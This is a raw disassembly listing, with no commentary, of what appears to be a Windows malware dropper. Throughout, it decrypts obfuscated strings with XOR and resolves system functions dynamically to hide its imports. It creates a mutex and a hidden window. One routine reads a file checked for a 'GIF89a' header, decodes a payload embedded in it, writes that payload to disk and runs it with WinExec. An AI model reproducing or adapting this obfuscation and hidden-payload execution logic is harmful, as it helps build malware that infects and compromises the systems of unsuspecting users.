xor eax, eax
inc eax
pop edi
pop esi
leave
retn 8
sub_442318 endp
; =============== S U B R O U T I N E =======================================
sub_442386 proc near ; CODE XREF: sub_442C0A+16�p
push edi
push offset word_44B932
call sub_4424C1
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B1E4, eax
test eax, eax
jnz short loc_4423B9
push offset byte_44B925
call sub_4424C1
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B1E4, eax
loc_4423B9: ; CODE XREF: sub_442386+1A�j
push offset word_44B912
call sub_4424C1
push eax
push dword_44B1E4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44ABB4, eax
push offset word_44B8FE
call sub_4424C1
push eax
push dword_44B1E4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447620, eax
push offset word_44B8EE
call sub_4424C1
push eax
push dword_44B1E4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4470D0, eax
push offset dword_44B8DC
call sub_4424C1
push eax
push dword_44B1E4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4470D8, eax
push offset byte_44B8CD
call sub_4424C1
add esp, 14h
push eax
push dword_44B1E4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A644, eax
pop edi
retn
sub_442386 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44244A proc near ; CODE XREF: sub_43B52C+A4�p
; sub_43E5D5+14B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov eax, dword_44B0E4
movsx edx, word_44B0D8
mov esi, eax
add esi, edx
sub esi, 7
jmp short loc_44249D
; ---------------------------------------------------------------------------
loc_442468: ; CODE XREF: sub_44244A+56�j
call ds:dword_44ABAC
mov edi, dword_44B164
add edi, 5Dh
movsx edx, word_44B110
add edi, edx
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
add edi, eax
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_44249D: ; CODE XREF: sub_44244A+1C�j
cmp esi, [ebp+arg_4]
jl short loc_442468
mov eax, [ebp+arg_4]
movsx edx, word_44B148
sub edx, 3
mov [ebx+eax], dl
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_44244A endp
; =============== S U B R O U T I N E =======================================
sub_4424B9 proc near ; DATA XREF: .data:0044B2C0�o
mov eax, 80004001h
retn 8
sub_4424B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4424C1 proc near ; CODE XREF: sub_43A34D+205�p
; sub_43A34D+2B7�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword_44B1D0, 0
jnz short loc_4424E9
push offset dword_44ABC0
call ds:dword_446008 ; InitializeCriticalSection
mov dword_44B1D0, 1
loc_4424E9: ; CODE XREF: sub_4424C1+11�j
mov esi, dword_44B118
add esi, dword_44B11C
dec esi
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+1]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, dword_44B184
sub edx, 3
cmp eax, edx
jz short loc_44259B
push offset dword_44ABC0
call ds:dword_44A65C ; RtlEnterCriticalSection
movsx eax, word_44B0E0
add eax, 3
mov [ebp+var_2], ax
jmp short loc_44254F
; ---------------------------------------------------------------------------
loc_44253A: ; CODE XREF: sub_4424C1+98�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+2]
xor edx, ecx
mov [eax], dl
inc [ebp+var_2]
loc_44254F: ; CODE XREF: sub_4424C1+77�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_44253A
mov eax, dword_44B160
add eax, dword_44B108
sub eax, 8
movsx edx, word_44B150
sub edx, 5
mov [edi+eax], dl
mov eax, dword_44B14C
add eax, dword_44B164
sub eax, 5
mov edx, dword_44B178
sub edx, 3
mov [edi+eax], dl
push offset dword_44ABC0
call ds:dword_44964C ; RtlLeaveCriticalSection
loc_44259B: ; CODE XREF: sub_4424C1+5C�j
lea eax, [edi+3]
pop edi
pop esi
pop ebx
leave
retn
sub_4424C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4425A3 proc near ; DATA XREF: .data:0044B2CC�o
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_4]
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
mov eax, dword_44B164
add eax, 0F8h
add eax, dword_44B0E4
cmp edi, eax
jnz short loc_4425D2
push [ebp+arg_14]
call sub_43F0EA
pop ecx
xor eax, eax
jmp short loc_4425F2
; ---------------------------------------------------------------------------
loc_4425D2: ; CODE XREF: sub_4425A3+20�j
mov eax, dword_44B0D4
add eax, 102h
cmp edi, eax
jnz short loc_4425ED
push [ebp+arg_14]
call sub_443E95
pop ecx
xor eax, eax
jmp short loc_4425F2
; ---------------------------------------------------------------------------
loc_4425ED: ; CODE XREF: sub_4425A3+3B�j
mov eax, 80020003h
loc_4425F2: ; CODE XREF: sub_4425A3+2D�j
; sub_4425A3+48�j
pop edi
pop ebp
retn 24h
sub_4425A3 endp
; =============== S U B R O U T I N E =======================================
sub_4425F7 proc near ; CODE XREF: sub_442C0A+20�p
push edi
push offset word_44B8C2
call sub_4424C1
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B1EC, eax
test eax, eax
jnz short loc_44262A
push offset byte_44B8B7
call sub_4424C1
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B1EC, eax
loc_44262A: ; CODE XREF: sub_4425F7+1A�j
cmp dword_44B1EC, 0
jz short loc_442650
push offset byte_44B8A1
call sub_4424C1
pop ecx
push eax
push dword_44B1EC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447600, eax
loc_442650: ; CODE XREF: sub_4425F7+3A�j
pop edi
retn
sub_4425F7 endp
; =============== S U B R O U T I N E =======================================
sub_442652 proc near ; DATA XREF: sub_4401E7+7�o
movsx eax, word_44B1A8
inc eax
push eax
call ds:dword_44A660 ; ExitThread
retn
sub_442652 endp
; =============== S U B R O U T I N E =======================================
sub_442662 proc near ; CODE XREF: sub_440946+26E�p
push edi
push offset byte_44B893
call sub_4424C1
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B1D8, eax
test eax, eax
jnz short loc_442695
push offset byte_44B885
call sub_4424C1
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B1D8, eax
loc_442695: ; CODE XREF: sub_442662+1A�j
push offset byte_44B87B
call sub_4424C1
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A630, eax
push offset dword_44B870
call sub_4424C1
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445030, eax
push offset dword_44B868
call sub_4424C1
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445054, eax
push offset dword_44B860
call sub_4424C1
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447A38, eax
push offset word_44B856
call sub_4424C1
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447A2C, eax
push offset dword_44B84C
call sub_4424C1
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A648, eax
push offset word_44B842
call sub_4424C1
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449634, eax
push offset dword_44B838
call sub_4424C1
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449640, eax
push offset dword_44B830
call sub_4424C1
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44ABAC, eax
push offset byte_44B827
call sub_4424C1
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A600, eax
push offset byte_44B81D
call sub_4424C1
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445020, eax
push offset word_44B812
call sub_4424C1
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A634, eax
push offset word_44B806
call sub_4424C1
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44824C, eax
push offset dword_44B7FC
call sub_4424C1
add esp, 38h
push eax
push dword_44B1D8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4471F4, eax
pop edi
retn
sub_442662 endp
; =============== S U B R O U T I N E =======================================
sub_442822 proc near ; CODE XREF: sub_442C0A+25�p
push edi
push offset word_44B7EE
call sub_4424C1
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B1F0, eax
test eax, eax
jnz short loc_442855
push offset dword_44B7E0
call sub_4424C1
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B1F0, eax
loc_442855: ; CODE XREF: sub_442822+1A�j
cmp dword_44B1F0, 0
jz short loc_44287A
movsx eax, word_44B148
add eax, 2
push eax
push dword_44B1F0
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44501C, eax
loc_44287A: ; CODE XREF: sub_442822+3A�j
pop edi
retn
sub_442822 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44287C proc near ; DATA XREF: sub_43B52C+81�o
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_1FE = byte ptr -1FEh
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 21Ch
push ebx
push esi
push edi
lea eax, [ebp+var_210]
push eax
push offset dword_4470F0
call sub_43ACC9
add esp, 8
mov [ebp+var_208], eax
test eax, eax
jnz short loc_4428AD
xor eax, eax
jmp loc_442A41
; ---------------------------------------------------------------------------
loc_4428AD: ; CODE XREF: sub_44287C+28�j
mov eax, dword_44B0A0
movsx edx, word_44B0B0
add eax, edx
sub eax, 8
mov [ebp+var_204], eax
loc_4428C4: ; CODE XREF: sub_44287C+1B1�j
mov eax, [ebp+var_204]
mov edx, [ebp+var_208]
lea ecx, [edx+eax]
or eax, 0FFFFFFFFh
loc_4428D6: ; CODE XREF: sub_44287C+5F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4428D6
mov [ebp+var_20C], eax
cmp [ebp+var_20C], 0FFh
jnb short loc_442913
mov eax, [ebp+var_204]
mov edx, dword_44B1B8
sub edx, 2
add eax, edx
add eax, [ebp+var_208]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_444B60
loc_442913: ; CODE XREF: sub_44287C+71�j
mov eax, dword_44B15C
mov esi, eax
add esi, dword_44B178
sub esi, 7
jmp short loc_44294A
; ---------------------------------------------------------------------------
loc_442925: ; CODE XREF: sub_44287C+E0�j
cmp [ebp+esi+var_FF], 28h
jnz short loc_442937
mov [ebp+esi+var_FF], 2Bh
loc_442937: ; CODE XREF: sub_44287C+B1�j
cmp [ebp+esi+var_FF], 29h
jnz short loc_442949
mov [ebp+esi+var_FF], 3Dh
loc_442949: ; CODE XREF: sub_44287C+C3�j
inc esi
loc_44294A: ; CODE XREF: sub_44287C+A7�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_442953: ; CODE XREF: sub_44287C+DC�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_442953
cmp esi, eax
jb short loc_442925
push 0FFh
lea eax, [ebp+var_1FE]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_44335A
add esp, 0Ch
mov ebx, eax
mov edi, dword_44B160
sub edi, 8
jmp short loc_4429B4
; ---------------------------------------------------------------------------
loc_442986: ; CODE XREF: sub_44287C+13A�j
movsx eax, [ebp+edi+var_1FE]
mov [ebp+var_218], eax
mov eax, edi
mul edi
mov [ebp+var_21C], eax
mov eax, [ebp+var_218]
mov edx, [ebp+var_21C]
sub eax, edx
mov [ebp+edi+var_1FE], al
inc edi
loc_4429B4: ; CODE XREF: sub_44287C+108�j
cmp edi, ebx
jb short loc_442986
movsx eax, word_44B110
sub eax, 3
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1FE]
push eax
call sub_43D744
add esp, 0Ch
mov [ebp+var_214], eax
mov eax, dword_44B14C
add eax, 0FFF8h
add eax, dword_44B1B4
cmp [ebp+var_214], eax
jz short loc_442A04
push [ebp+var_208]
call ds:dword_447618 ; LocalFree
xor eax, eax
inc eax
jmp short loc_442A41
; ---------------------------------------------------------------------------
loc_442A04: ; CODE XREF: sub_44287C+175�j
mov eax, [ebp+var_20C]
mov edx, dword_44B1A4
add edx, dword_44B160
sub edx, 3
add eax, edx
add [ebp+var_204], eax
mov eax, [ebp+var_210]
cmp [ebp+var_204], eax
jb loc_4428C4
push [ebp+var_208]
call ds:dword_447618 ; LocalFree
xor eax, eax
loc_442A41: ; CODE XREF: sub_44287C+2C�j
; sub_44287C+186�j
pop edi
pop esi
pop ebx
leave
retn
sub_44287C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442A46 proc near ; CODE XREF: sub_43DEF2+2CD�p
; sub_4438E7+23B�p
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_316 = byte ptr -316h
var_212 = byte ptr -212h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 32Ch
push ebx
push esi
push edi
push [ebp+arg_4]
call ds:dword_44A630
pop ecx
push [ebp+arg_0]
lea eax, [ebp+var_316]
push eax
call sub_444B60
lea ecx, [ebp+var_316]
or eax, 0FFFFFFFFh
loc_442A74: ; CODE XREF: sub_442A46+33�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_442A74
mov edx, dword_44B160
sub edx, 7
mov ebx, eax
sub ebx, edx
movsx edx, word_44B194
add edx, dword_44B0F8
sub edx, 2
mov [ebp+ebx+var_316], dl
mov edi, dword_44B158
loc_442AA5: ; CODE XREF: sub_442A46+158�j
mov eax, edi
movsx ecx, word_44B16C
add ecx, dword_44B094
sub ecx, 8
mul ecx
mov [ebp+var_320], eax
movsx eax, [ebp+edi+var_316]
mov edx, [ebp+var_320]
mov [ebp+edx+var_212], al
mov eax, edi
mov ecx, dword_44B0AC
dec ecx
mul ecx
mov [ebp+var_324], eax
mov eax, dword_44B178
sub eax, 2
mov edx, [ebp+var_324]
add edx, eax
mov eax, dword_44B0FC
sub eax, 7
mov [ebp+edx+var_212], al
movsx eax, [ebp+edi+var_316]
mov edx, dword_44B104
sub edx, 3
cmp eax, edx
jnz loc_442B9D
mov eax, edi
movsx ecx, word_44B0E0
add ecx, dword_44B0E4
mul ecx
mov [ebp+var_328], eax
movsx eax, word_44B19C
add eax, dword_44B1AC
sub eax, 8
mov edx, [ebp+var_328]
add edx, eax
mov eax, dword_44B0D4
dec eax
mov [ebp+edx+var_212], al
mov eax, edi
mov ecx, dword_44B11C
add ecx, dword_44B10C
sub ecx, 8
mul ecx
mov [ebp+var_32C], eax
movsx eax, word_44B0D8
sub eax, 2
mov edx, [ebp+var_32C]
add edx, eax
movsx eax, word_44B090
add eax, dword_44B0A4
sub eax, 3
mov [ebp+edx+var_212], al
jmp short loc_442BA3
; ---------------------------------------------------------------------------
loc_442B9D: ; CODE XREF: sub_442A46+D1�j
inc edi
jmp loc_442AA5
; ---------------------------------------------------------------------------
loc_442BA3: ; CODE XREF: sub_442A46+155�j
cmp dword_44B1EC, 0
jz short loc_442BE4
lea eax, [ebp+var_212]
push eax
push 0
call ds:dword_447600
mov esi, eax
or esi, esi
jz short loc_442BE4
cmp dword_44B1F0, 0
jz short loc_442C05
mov eax, dword_44B1AC
sub eax, 3
neg eax
push eax
lea eax, [ebp+var_212]
push eax
push 0
call ds:dword_44501C
loc_442BE4: ; CODE XREF: sub_442A46+164�j
; sub_442A46+179�j
push ds:dword_447610
push ds:off_44A610
lea eax, [ebp+var_316]
push eax
call sub_43C38A
add esp, 0Ch
mov [ebp+var_31C], eax
loc_442C05: ; CODE XREF: sub_442A46+182�j
pop edi
pop esi
pop ebx
leave
retn
sub_442A46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442C0A proc near ; DATA XREF: sub_440946+C�o
; sub_440946+2A5�o
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = byte ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_45 = byte ptr -45h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 158h
push ebx
push esi
push edi
call sub_43EA51
call sub_43AA12
call sub_442386
call sub_43AED7
call sub_4425F7
call sub_442822
call sub_43AD5A
call sub_44015B
loc_442C3E: ; CODE XREF: sub_442C0A+89�j
call sub_4437B1
mov ebx, eax
mov [ebp+var_45], bl
movzx eax, [ebp+var_45]
mov edx, dword_44B1AC
sub edx, 2
cmp eax, edx
jnz short loc_442C6E
mov eax, dword_44B138
add eax, dword_44B18C
sub eax, 8
push eax
call ds:dword_44A660 ; ExitThread
loc_442C6E: ; CODE XREF: sub_442C0A+4D�j
movzx eax, [ebp+var_45]
mov edx, dword_44B108
inc edx
cmp eax, edx
jnz short loc_442C95
mov eax, dword_44B1B4
add eax, 5Ch
add eax, dword_44B0FC
push eax
call ds:dword_44A630
pop ecx
jmp short loc_442C3E
; ---------------------------------------------------------------------------
loc_442C95: ; CODE XREF: sub_442C0A+71�j
push offset dword_44B7D4
call sub_4424C1
mov [ebp+var_154], eax
push offset word_44B7CA
call sub_4424C1
mov esi, dword_44B1C8
movsx ebx, word_44B1BC
add esi, ebx
sub esi, 7
push esi
push eax
mov esi, [ebp+var_154]
push esi
lea esi, [ebp+var_144]
push esi
call ds:dword_44A634
lea eax, [ebp+var_144]
push eax
push 0
push 0
call ds:dword_44A61C ; CreateMutexA
push 0
call ds:dword_4475E8 ; GetModuleHandleA
mov edi, eax
push offset dword_44B7C0
call sub_4424C1
mov [ebp+var_20], eax
mov [ebp+var_34], edi
lea eax, sub_440306
mov [ebp+var_40], eax
push 7F00h
push 0
call ds:dword_448220 ; LoadCursorA
mov [ebp+var_2C], eax
push 7F03h
push 0
call ds:dword_44A620 ; LoadIconA
mov [ebp+var_30], eax
and [ebp+var_24], 0
push 0
call ds:dword_446120 ; GetStockObject
mov [ebp+var_28], eax
mov [ebp+var_44], 3
mov eax, dword_44B17C
add eax, dword_44B09C
sub eax, 0Eh
mov [ebp+var_3C], eax
mov eax, dword_44B164
mov [ebp+var_38], eax
lea eax, [ebp+var_44]
push eax
call ds:dword_4470DC ; RegisterClassA
push offset word_44B7B6
call sub_4424C1
mov [ebp+var_158], eax
push offset dword_44B7AC
call sub_4424C1
push 0
push edi
push 0
push 0
mov esi, dword_44B17C
sub esi, 6
push esi
mov esi, dword_44B0C0
movsx ebx, word_44B0E0
add esi, ebx
dec esi
push esi
movsx esi, word_44B100
sub esi, 9
push esi
movsx esi, word_44B168
movsx ebx, word_44B0DC
add esi, ebx
sub esi, 0Eh
push esi
push 0CA0000h
push eax
mov esi, [ebp+var_158]
push esi
mov esi, dword_44B09C
add esi, dword_44B0A4
sub esi, 0Ah
push esi
call ds:dword_449648 ; CreateWindowExA
mov ds:dword_44760C, eax
lea eax, [ebp+var_148]
push eax
push edi
call sub_43B333
add esp, 2Ch
mov [ebp+var_14C], eax
mov ds:off_44A610, eax
mov eax, [ebp+var_148]
mov ds:dword_447610, eax
call sub_43A33B
lea eax, [ebp+var_150]
push eax
movsx eax, word_44B100
add eax, dword_44B160
sub eax, 11h
push eax
push 0
push offset sub_43E8A2
mov eax, dword_44B1C4
sub eax, 5
push eax
push 0
call ds:dword_44AB90 ; CreateThread
push eax
call ds:dword_449650 ; CloseHandle
call sub_43B52C
call sub_43FEB1
jmp short loc_442E69
; ---------------------------------------------------------------------------
loc_442E55: ; CODE XREF: sub_442C0A+283�j
lea eax, [ebp+var_1C]
push eax
call ds:dword_44A77C ; TranslateMessage
lea eax, [ebp+var_1C]
push eax
call ds:dword_445050 ; DispatchMessageA
loc_442E69: ; CODE XREF: sub_442C0A+249�j
movsx eax, word_44B114
sub eax, 2
push eax
movsx eax, word_44B170
sub eax, 8
push eax
push 0
lea eax, [ebp+var_1C]
push eax
call ds:dword_448368 ; GetMessageA
or eax, eax
jnz short loc_442E55
pop edi
pop esi
pop ebx
leave
retn 4
sub_442C0A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442E96 proc near ; CODE XREF: sub_43DAAC+219�p
; sub_43DAAC+22B�p
var_61DA0 = dword ptr -61DA0h
var_61D9C = dword ptr -61D9Ch
var_61D98 = byte ptr -61D98h
var_61C99 = byte ptr -61C99h
var_61C98 = dword ptr -61C98h
var_61C91 = byte ptr -61C91h
var_30F51 = byte ptr -30F51h
var_30F50 = dword ptr -30F50h
var_30F4B = byte ptr -30F4Bh
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30E3E = byte ptr -30E3Eh
var_30E3D = byte ptr -30E3Dh
var_30E3C = byte ptr -30E3Ch
var_30E3B = byte ptr -30E3Bh
var_30E3A = byte ptr -30E3Ah
var_30E15 = byte ptr -30E15h
var_30E14 = byte ptr -30E14h
var_30DBE = byte ptr -30DBEh
var_30DBD = byte ptr -30DBDh
var_30DBC = byte ptr -30DBCh
var_30D46 = byte ptr -30D46h
var_30D43 = byte ptr -30D43h
var_30D41 = byte ptr -30D41h
var_30D40 = byte ptr -30D40h
var_30D3F = byte ptr -30D3Fh
var_30D3B = byte ptr -30D3Bh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 61DA0h
call sub_444B40
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
and [ebp+var_30F50], 0
push 0
mov eax, dword_44B138
add eax, dword_44B174
sub eax, 11h
push eax
push 3
push 0
mov eax, dword_44B18C
dec eax
push eax
push 80000000h
push [ebp+arg_0]
call ds:dword_44A788 ; CreateFileA
mov [ebp+var_30E48], eax
cmp eax, 0FFFFFFFFh
jz loc_443355
push 0
lea eax, [ebp+var_30E4C]
push eax
movsx eax, word_44B114
mov edx, dword_44B120
lea eax, [eax+edx+80h]
push eax
lea eax, [ebp+var_30E3F]
push eax
push [ebp+var_30E48]
call ds:dword_445028 ; ReadFile
mov [ebp+var_30E44], eax
mov eax, dword_44B17C
add eax, dword_44B12C
sub eax, 0Bh
cmp [ebp+var_30E44], eax
jz loc_443337
cmp [ebp+var_30E3F], 47h
jnz short loc_442F70
cmp [ebp+var_30E3E], 49h
jnz short loc_442F70
cmp [ebp+var_30E3D], 46h
jnz short loc_442F70
cmp [ebp+var_30E3C], 38h
jnz short loc_442F70
cmp [ebp+var_30E3B], 39h
jnz short loc_442F70
cmp [ebp+var_30E3A], 61h
jz short loc_442F75
loc_442F70: ; CODE XREF: sub_442E96+AB�j
; sub_442E96+B4�j ...
jmp loc_443337
; ---------------------------------------------------------------------------
loc_442F75: ; CODE XREF: sub_442E96+D8�j
movzx eax, [ebp+var_30E15]
mov edx, dword_44B1C0
add edx, 35h
add edx, dword_44B1B8
cmp eax, edx
jnz short loc_442FA1
cmp [ebp+var_30DBE], 3Dh
jnz short loc_442FA1
cmp [ebp+var_30DBD], 3Dh
jz short loc_442FA6
loc_442FA1: ; CODE XREF: sub_442E96+F7�j
; sub_442E96+100�j
jmp loc_443337
; ---------------------------------------------------------------------------
loc_442FA6: ; CODE XREF: sub_442E96+109�j
or ebx, ebx
jnz short loc_442FD5
mov al, [ebp+var_30DBC]
mov [ebp+var_30F51], al
call sub_443C06
mov edx, eax
mov [ebp+var_61C99], dl
mov al, [ebp+var_61C99]
cmp al, [ebp+var_30F51]
jz loc_443337
loc_442FD5: ; CODE XREF: sub_442E96+112�j
push 0
lea eax, [ebp+var_30E4C]
push eax
push 30D40h
lea eax, [ebp+var_61C91]
push eax
push [ebp+var_30E48]
call ds:dword_445028 ; ReadFile
mov [ebp+var_30E44], eax
movsx eax, word_44B100
add eax, dword_44B0A0
sub eax, 0Dh
cmp [ebp+var_30E44], eax
jz loc_443337
mov eax, [ebp+var_30E4C]
mov edx, dword_44B10C
movsx ecx, word_44B0D8
add edx, ecx
sub edx, 0Ch
mov [ebp+eax+var_61C91], dl
push 30D40h
lea eax, [ebp+var_30D40]
push eax
lea eax, [ebp+var_61C91]
push eax
call sub_44335A
add esp, 0Ch
mov esi, eax
mov edi, dword_44B0D4
dec edi
jmp short loc_4430A2
; ---------------------------------------------------------------------------
loc_44305D: ; CODE XREF: sub_442E96+20E�j
or ebx, ebx
jz short loc_443074
movzx eax, [ebp+edi+var_30D40]
sub eax, edi
mov [ebp+edi+var_30D40], al
jmp short loc_4430A1
; ---------------------------------------------------------------------------
loc_443074: ; CODE XREF: sub_442E96+1C9�j
movzx eax, [ebp+edi+var_30D40]
mov [ebp+var_61D9C], eax
mov eax, edi
mul edi
mov [ebp+var_61DA0], eax
mov eax, [ebp+var_61D9C]
mov edx, [ebp+var_61DA0]
sub eax, edx
mov [ebp+edi+var_30D40], al
loc_4430A1: ; CODE XREF: sub_442E96+1DC�j
inc edi
loc_4430A2: ; CODE XREF: sub_442E96+1C5�j
cmp edi, esi
jb short loc_44305D
or ebx, ebx
jz short loc_4430D6
mov eax, dword_44B0E4
add eax, dword_44B0FC
sub eax, 8
mov edx, esi
sub edx, eax
movsx eax, word_44B0F4
movsx ecx, word_44B148
add eax, ecx
sub eax, 0Ch
mov [ebp+edx+var_30D40], al
loc_4430D6: ; CODE XREF: sub_442E96+212�j
movsx eax, word_44B100
mov edx, dword_44B134
lea eax, [eax+edx+77h]
movsx edx, word_44B154
sub edx, 8
mov [ebp+eax+var_30E3F], dl
push 0FFh
lea eax, [ebp+var_61D98]
push eax
lea eax, [ebp+var_30E14]
push eax
call sub_44335A
lea eax, [ebp+var_61D98]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
call sub_43C281
add esp, 18h
mov [ebp+var_30E44], eax
movsx eax, word_44B0D8
sub eax, 5
cmp [ebp+var_30E44], eax
jnz loc_443337
mov [ebp+var_30F50], 1
or ebx, ebx
jz loc_443288
mov eax, dword_44B124
cmp [ebp+eax+var_30D41], 64h
jnz loc_4431FC
movzx eax, [ebp+var_30D3F]
mov edx, dword_44B1C4
add edx, 1Bh
sub eax, edx
mov byte ptr [ebp+var_61D9C+3], al
movzx eax, byte ptr [ebp+var_61D9C+3]
push eax
push 0
call sub_441FCC
mov eax, dword_44B130
movsx edx, word_44B0F4
add eax, edx
sub eax, 9
mov ds:dword_44761C, eax
mov eax, dword_44B178
movsx edx, word_44B090
add eax, edx
sub eax, 4
mov dword_44B290, eax
mov eax, dword_44B164
add eax, dword_44B160
movsx edx, word_44B090
movsx ecx, word_44B0E0
add edx, ecx
dec edx
mov [ebp+eax+var_30D46], dl
mov eax, dword_44B1A0
add eax, dword_44B0F0
sub eax, 9
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_43B182
add esp, 10h
loc_4431FC: ; CODE XREF: sub_442E96+2CC�j
mov eax, dword_44B104
add eax, dword_44B108
cmp [ebp+eax+var_30D43], 67h
jnz loc_443337
mov eax, dword_44B12C
movsx edx, word_44B154
sub edx, 8
mov [ebp+eax+var_30D3B], dl
lea eax, [ebp+var_30D3F]
push eax
call ds:dword_445054
mov [ebp+var_61D9C], eax
push eax
push offset dword_44A670
call sub_43E1CC
mov eax, dword_44B138
sub eax, 8
mov ds:dword_44761C, eax
mov eax, dword_44B098
sub eax, 7
mov dword_44B290, eax
movsx eax, word_44B19C
add eax, dword_44B11C
sub eax, 8
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_43B182
add esp, 14h
jmp loc_443337
; ---------------------------------------------------------------------------
loc_443288: ; CODE XREF: sub_442E96+2B9�j
mov eax, dword_44B1B0
add eax, 4
add eax, dword_44B178
push eax
lea eax, [ebp+var_30F4B]
push eax
call sub_44244A
push offset dword_44B7A4
call sub_4424C1
push eax
lea edx, [ebp+var_30F4B]
push edx
call ds:dword_445020
push 0
push 80h
push 2
push 0
movsx eax, word_44B0E8
add eax, dword_44B12C
sub eax, 0Ah
push eax
push 40000000h
lea eax, [ebp+var_30F4B]
push eax
call ds:dword_44A788 ; CreateFileA
mov [ebp+var_61C98], eax
push 0
lea eax, [ebp+var_30E4C]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
push [ebp+var_61C98]
call ds:dword_44AB8C ; WriteFile
push [ebp+var_61C98]
call ds:dword_449650 ; CloseHandle
push 5
lea eax, [ebp+var_30F4B]
push eax
call ds:dword_4470E0 ; WinExec
movzx eax, [ebp+var_30F51]
push eax
call sub_43DE0F
add esp, 18h
